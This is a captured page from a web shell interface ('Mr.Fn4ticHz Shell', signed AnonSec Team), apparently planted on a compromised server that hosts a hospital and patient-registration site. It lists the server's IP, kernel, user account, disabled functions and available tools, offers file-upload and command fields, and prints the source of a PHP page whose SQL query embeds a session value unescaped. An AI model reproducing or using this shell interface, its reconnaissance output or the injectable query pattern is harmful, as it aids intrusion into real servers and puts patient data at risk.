Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.15.226.120
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//DownloadLink.php
<?php
session_start();
require_once("../LoginManager.php");
require_once("../DBManager.php");
include("workdeskmenu.php");
include("header.php");

if(isset($_SESSION[uname]))

    $sql1 ="SELECT * FROM site_users WHERE uname='$_SESSION[uname]'";
		$qsql1 = mysqli_query($con,$sql1);
		$rd1 = mysqli_fetch_array($qsql1);
	//	echo $rd1['userno'];


?>
 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
  <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>

    <script src="../dist/js/price.js"></script>
    <br>
    <br>
	<a style="color:blue"  target="_blank" href='patient-registration-qr.php?hospitalId=<?php echo $rd1['userno'] ?>'><u>Download QR code sticker for patient care Registration application Link</u></a>
	<br>
    <br>
	<a style="color:blue"  target="_blank" href='uploads/Hospital Management Link.pdf'><u>Download QR code sticker for Hospital Management application Link</u></a>
		<br>
    <br>
	<a style="color:blue"  target="_blank" href='uploads/Patient Registration.pdf'><u>Download Patient Registration  </u></a>
		<br>
    <br>
	<a style="color:blue"  target="_blank" href='uploads/Initial Assessment - General.pdf'><u>Download Initial Assessment-General  </u></a>
		<br>
    <br>
		<a style="color:blue"  target="_blank" href='uploads/Admission Slip.pdf'><u>Download Admission Slip </u></a>
</body>
</html>

Anon7 - 2022
AnonSec Team